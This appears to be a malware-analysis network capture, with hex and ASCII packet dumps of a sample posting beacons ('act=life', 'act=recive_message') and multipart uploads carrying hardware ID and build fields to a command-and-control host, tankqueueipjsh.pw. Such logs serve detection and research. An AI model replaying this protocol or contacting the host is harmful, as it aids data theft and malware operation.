Dec 6, 2023 14:52:39.896749973 CET	1340	IN	Data Raw: f9 b5 08 c8 ed 24 b0 19 ac db 50 a8 45 b7 38 c6 be 96 ce d7 43 f4 a3 cf 3e 7c e8 9f 67 f0 0e e5 99 9d 4d e3 7f 95 16 29 33 d6 f5 dd 07 c4 f7 b9 30 83 0e 6d d5 aa 06 bb 2f 25 06 b4 06 58 76 b4 df 65 aa 1a 6b 89 35 55 5f 75 05 76 44 ac f6 53 d9 de Data Ascii: $PE8C>\|gM)30m/%Xvek5U_uvDSEi%?de%*qVc\hmm\|"Y:X#X<oVxB?[<5=f[BKZ\|}ld+I\| _f.BAn>J]
Dec 6, 2023 14:52:39.896805048 CET	1340	IN	Data Raw: 3f 30 ed c8 fd 10 09 09 7c 8a 18 9f 52 3a 99 7a 33 13 df 17 34 ee da c3 79 4a 04 f6 76 8f e3 3b db 5b 1c 53 a2 82 b1 a3 8c c9 a2 92 f8 e7 4c aa 23 a8 c6 87 f7 8b 9a 29 33 e6 2b 68 2d f5 ce 3b 46 e9 d4 b5 ae 8f 9e a3 f8 d7 35 12 ad 93 bf 15 e2 eb Data Ascii: ?0\|R:z34yJv;[SL#)3+h-;F5uc0<mrG1Ghv!\_~XQ+4nUk}R0uYDXgJt52<Z!pUuj!-HM{=l/yFaa8[SOQ^
Dec 6, 2023 14:52:39.896856070 CET	1340	IN	Data Raw: 9d 99 07 49 38 b7 ee e1 a0 ea 16 b4 bb e1 fe cc 0f 0d 99 51 55 aa db be 7a 9d 5e 8f 1c c4 21 92 79 bb 03 8e 2d b2 db 1c 54 aa cd c2 d7 c5 67 f9 61 28 8c 5b c2 a2 55 7f 60 c0 3e 4c 00 19 03 7d f7 29 82 31 b8 3a ea b0 bf 6e 91 18 61 c5 93 0d d8 dc Data Ascii: I8QUz^!y-Tga([U`>L})1:naU9qoifp%)3@BF)Y,oQl>pO+j}wp:sDm>B {7 f=Vg>fVL"tAdo\1/igg`\|f.
Dec 6, 2023 14:52:40.076694965 CET	1340	IN	Data Raw: a0 c5 4e 24 36 55 df 9b 66 61 fd 59 0e 4e 9e c0 c5 80 c7 61 f3 ad a4 b3 3a 61 5c 5e e1 0e b1 0a 30 77 43 dc 1f a9 98 68 af 91 74 ce 08 57 e2 e5 78 97 43 dc cd 75 ef 42 ff da ba ec 06 b8 1e 15 52 9d e8 94 0f 47 62 f2 4f 66 b3 84 19 d5 b6 c8 fc ea Data Ascii: N$6UfaYNa:a\^0wChtWxCuBRGbOf#H):gP `9!d*V>}-@_Vx78Jwe1,_(J[JKE % G.!9jp.Gd?k'g,HJ93Ws3

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:52.796842098 CET	318	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:52.796885014 CET	62	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 6, 2023 14:52:53.143456936 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=i15uruq1nhm9nbi3qul3emcmu8; expires=Sun, 31 Mar 2024 07:39:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DMrcDiM3T89VNblg7cnsjBJEuAY3TwvzWfqej49EzbJKVmvSJHU5zrpmDtzvpGK11sKYghNc7HwDpjpfZqgjILE9EUQ2ERlOe1WcXzdvxFEh1QJgQ7%2Fy0VBmTt6C%2BFfpAmqEFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudf Data Raw: Data Ascii:
Dec 6, 2023 14:52:53.143501043 CET	98	IN	Data Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 30 61 33 66 31 65 39 63 32 61 2d 49 41 44 0d 0a 0d 0a 32 0d 0a 6f 6b 0d 0a Data Ascii: areCF-RAY: 8315030a3f1e9c2a-IAD2ok
Dec 6, 2023 14:52:53.143536091 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 6, 2023 14:52:53.146992922 CET	319	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 72 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:53.147047043 CET	126	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4d 65 44 4e 4e 31 26 6a 3d 65 32 31 31 30 62 33 32 32 35 31 39 31 34 66 36 63 31 30 36 30 34 64 35 31 62 38 39 66 37 61 61 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=MeDNN1&j=e2110b32251914f6c10604d51b89f7aa&ver=4.0
Dec 6, 2023 14:52:53.414052963 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=tn68jkjcp9uuqff7f0de6erd8c; expires=Sun, 31 Mar 2024 07:39:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RPj83uzDyjkMBP1e3icsuLyDSz3gjN9gJwLwhtBuy%2BCwh8ROB5JDxcUoDAuNT%2B%2BZBRXB%2FaYe27Z2Hn0z1GnfaxmezkNBe9JHEliXVkKU1vUXs0KyReMCI2VnJG3AfpX0uHUaQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cl Data Raw: Data Ascii:
Dec 6, 2023 14:52:53.414105892 CET	1340	IN	Data Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 30 63 36 39 38 37 39 63 32 61 2d 49 41 44 0d 0a 0d 0a 39 64 34 0d 0a 38 64 73 31 41 7a 32 7a 56 50 72 38 45 56 2f 74 71 6a 4c 35 5a 67 6b 4d 2b 4b 56 73 57 74 6f 6d 4d 2f 53 41 Data Ascii: udflareCF-RAY: 8315030c69879c2a-IAD9d48ds1Az2zVPr8EV/tqjL5ZgkM+KVsWtomM/SAOV89iP+K+UMhB4d42I90fdfMU5UVbCDaxAh44FJBgeUVfVjw3cuATiFY3XbA3nQ1j8temwdiY4jJDzK2QVuR410+UeWalL5UaVPaOZKRM3PPz0jbXCtBndENF7tVWNb9FSQf7ZHT4RdtVtE9kppzOoLNU5wHZmmQy
Dec 6, 2023 14:52:53.414144993 CET	1332	IN	Data Raw: 46 32 70 71 33 79 44 59 67 54 30 6b 7a 38 39 63 32 31 77 72 5a 35 50 56 41 44 61 78 53 56 65 65 35 56 55 77 56 4f 79 57 6c 4c 35 52 62 46 66 63 4d 35 75 66 64 7a 65 64 79 31 75 52 43 57 45 75 31 49 63 4a 49 50 67 63 45 62 48 75 63 69 31 45 2b 49 Data Ascii: F2pq3yDYgT0kz89c21wrZ5PVADaxSVee5VUwVOyWlL5RbFfcM5ufdzedy1uRCWEu1IcJIPgcEbHuci1E+IvTphl4H9Y62MYzPoDBX5MMZGGeyQg+tUFenPBTM1LhkpirV2xb3TKQlXl9wYhXg0QzLq/KATi7UhGJrEJ9WObdy/lbb1/eOpSVezyDxleeDWNmiMYKMLlKXpfmXjhb7ZmVthcvH9Yu2MYzEqj9Ero+K3HU3k4/tAQ
Dec 6, 2023 14:52:53.414182901 CET	1340	IN	Data Raw: 34 32 35 63 0d 0a 33 63 76 35 5a 6e 5a 66 6b 53 6e 57 68 7a 4d 36 67 34 67 49 32 77 74 6d 66 4a 62 49 44 6a 6d 37 51 46 71 52 35 46 30 38 58 4f 2b 65 6c 72 39 57 59 56 50 62 4d 5a 43 55 66 54 43 4a 7a 46 61 64 52 43 55 75 6e 64 39 4f 59 50 68 32 Data Ascii: 425c3cv5ZnZfkSnWhzM6g4gI2wtmfJbIDjm7QFqR5F08XO+elr9WYVPbMZCUfTCJzFadRCUund9OYPh2XJjrWDtS/LWi+UgvRpExlN4rfYvDWJcBY2ubzwQwt0tDl+1SOlTnkp28WXNY2j2Ql307z4YQnBwrNtrxDTazVV6V7hsiEfPdlLUXOR/dOJiRfzGEwFGXCmxrk88GKrlAWZfsVDxb75iXvlNnUJF42JlrfdeIf5wRS
Dec 6, 2023 14:52:53.414221048 CET	1340	IN	Data Raw: 6d 6f 76 35 44 79 46 2f 32 69 43 35 6b 48 67 76 7a 39 63 65 67 6b 52 73 59 74 71 66 54 6a 61 78 52 56 6d 59 37 6c 4d 35 54 65 71 57 6d 72 5a 57 62 6c 2f 53 4e 35 4b 57 59 54 75 50 77 31 69 63 44 47 39 67 69 4d 59 42 65 50 59 45 56 6f 36 69 41 33 Data Ascii: mov5DyF/2iC5kHgvz9cegkRsYtqfTjaxRVmY7lM5TeqWmrZWbl/SN5KWYTuPw1icDG9giMYBePYEVo6iA31u/JqUthVIWMo3kp14Mc/XHoJEbGLan041tElVhO5bPVbtl4G2WGxc0TOKn2EyhM1TnwtkYpLNTnb4Q0nWuhsRXPuX0Z5Nd1jdJ5OTf32QhknbA2cuwocOObVWVJfoUTBX5ZiWtlNlVN8klpFzO4TJVZgPYWCT1U5
Dec 6, 2023 14:52:53.414257050 CET	1340	IN	Data Raw: 46 59 79 58 62 41 33 6b 51 78 68 50 6c 54 6a 55 52 30 49 49 4f 48 43 54 54 34 48 42 47 51 36 6c 6f 7a 58 75 4f 55 6c 72 64 51 59 46 58 63 4f 35 69 51 66 7a 69 4b 77 6c 61 51 43 47 52 70 6e 63 67 48 4f 4c 31 46 57 74 61 73 47 7a 70 48 71 73 58 54 Data Ascii: FYyXbA3kQxhPlTjUR0IIOHCTT4HBGQ6lozXuOUlrdQYFXcO5iQfziKwlaQCGRpncgHOL1FWtasGzpHqsXTllB3XP41iZczIsHREJwIKzbaxwo1vU9SkuVbOVLglpS3WG5Y2zuekXc9j89QmwR5aZGHQHi/XBHOonI6WPiag/lIL0aRMZTeK32Fzl2SD2xmltUFN7tNVpDoWDVV7JOSvlJmTd89lZ15O8+GEJwcKzba6Q0prnZSh
Dec 6, 2023 14:52:53.414294004 CET	1340	IN	Data Raw: 6b 58 67 77 69 73 39 56 6c 51 68 74 61 70 72 4f 43 54 32 38 51 6c 2b 61 34 56 4d 78 57 36 72 54 30 37 35 50 49 51 65 52 46 35 57 50 66 44 43 65 33 6c 4f 4e 44 32 5a 69 32 50 49 4e 4e 72 5a 44 52 39 62 39 46 53 51 66 37 5a 48 54 34 52 64 6c 58 74 Data Ascii: kXgwis9VlQhtaprOCT28Ql+a4VMxW6rT075PIQeRF5WPfDCe3lOND2Zi2PINNrZDR9b9FSQf7ZHT4RdlXtU3nJB9OYPOXpYLbWSawAQwsEVcne1bOFLum5+4UiERkTGA3it9oc9TiUZKY4vIAyn6cVKY7FwrH/Wi3flWIQfoL9iIM2XdhhCJRDMu3cQcKr5HR5WlZQN45JqSr0d2UO8IjZ19M4jeQdtKK2Hanzd48ARu2KJDfQe
Dec 6, 2023 14:52:53.502269030 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:53.753278017 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=gphko5da3ilnbpuaheh68okikb; expires=Sun, 31 Mar 2024 07:39:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3L7JkYWQrr1la9AKItchXjmIPmV%2BD8M0E2IyFJKG%2FvJ2iQJH5jXOvr0EnbJMxFe2Nxmh4zjqMGDFA94qufHJiWhfoeYk6Lkv5XEmfSOqz0%2BnCI7%2BZM596MxF8%2Boojq%2BUJTzxSQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server Data Raw: Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:53.948885918 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:53.949210882 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 37 66 37 37 34 61 32 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l227f774a200004204a9bdd8819627u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:52:54.318305969 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=sr052255hboeu0us2flq64krlh; expires=Sun, 31 Mar 2024 07:39:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ym3dH0n00mYHUXT8syjm7b5YPYtd7v0lFAs4MPypCbx5ae37aC4qyfUS5tiqjuW2ii%2BE3RvkQHdjpqJCIXS4xP1bTQB95QPVxDHMOmw%2F3xjlOJrHCwvqcJ75fcM1noTU%2FK8%2BVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cl Data Raw: Data Ascii:
Dec 6, 2023 14:52:54.318341970 CET	122	IN	Data Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 31 31 36 64 36 37 39 63 37 39 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: udflareCF-RAY: 831503116d679c79-IAD15Malformed packet data
Dec 6, 2023 14:52:54.318444014 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:54.444571018 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:54.444807053 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 37 66 37 37 34 61 32 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l227f774a200004204a9bdd8819627u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:52:54.803710938 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=e7m9o0ma1hcp7vspbhfdg8cm0b; expires=Sun, 31 Mar 2024 07:39:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DIxgZu5yryik0%2B7Pso3Us6MLXSLXx9YtWXCcPUmMLPceYz6LaRbE3ZVUyOFWihB3K2vdF1s703Bqh7ZJ%2B5jMbTYFsVRhIXFDqDAjQIPxpg62%2Fh7d%2BNV15NNz48YhZp1Vj91UrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cl Data Raw: Data Ascii:
Dec 6, 2023 14:52:54.803756952 CET	122	IN	Data Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 31 34 38 38 61 34 35 62 36 61 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: udflareCF-RAY: 8315031488a45b6a-IAD15Malformed packet data
Dec 6, 2023 14:52:54.803791046 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:54.931535959 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:54.931746006 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 37 66 37 37 34 61 32 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l227f774a200004204a9bdd8819627u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:52:55.304970026 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=lljvopogmhqp4mamgho3ivqjvd; expires=Sun, 31 Mar 2024 07:39:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HxM9wC7ppGKSELbbfdV%2B7FoJQ0GJb06TiXndPfXwiU20eyiActqAkPWGGAN29MzndDPucn5lTrEt2BuaBoR4CA2XzgGW%2BOS3%2F%2Beh1DbGxiAvJeFQogmjuYqG43qpZygCI8tqcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cl Data Raw: Data Ascii:
Dec 6, 2023 14:52:55.305016994 CET	122	IN	Data Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 31 37 39 65 66 62 30 37 65 34 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: udflareCF-RAY: 831503179efb07e4-IAD15Malformed packet data
Dec 6, 2023 14:52:55.305052042 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:55.413216114 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:52:55.413460016 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 37 66 37 37 34 61 32 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l227f774a200004204a9bdd8819627u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:52:55.766017914 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=3s12jld5j9tbm7kblgslbroih0; expires=Sun, 31 Mar 2024 07:39:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:52:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nPFWMI%2BJvxGu067ugtbD%2BTJadnHZHAo5U3dHJWOeMi%2BDXGHDc%2Ff5uKskoAXCdSDL7g%2BC1CHBO7I5tPqqhZHiBX1X4j6eCchd1RGvpNSTZMo0G5onrrvuAsqhRKvRvA1%2B4xpd4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server Data Raw: Data Ascii:
Dec 6, 2023 14:52:55.766036034 CET	126	IN	Data Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 35 30 33 31 61 39 62 39 38 32 66 31 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: cloudflareCF-RAY: 8315031a9b982f1e-IAD15Malformed packet data
Dec 6, 2023 14:52:55.766052961 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0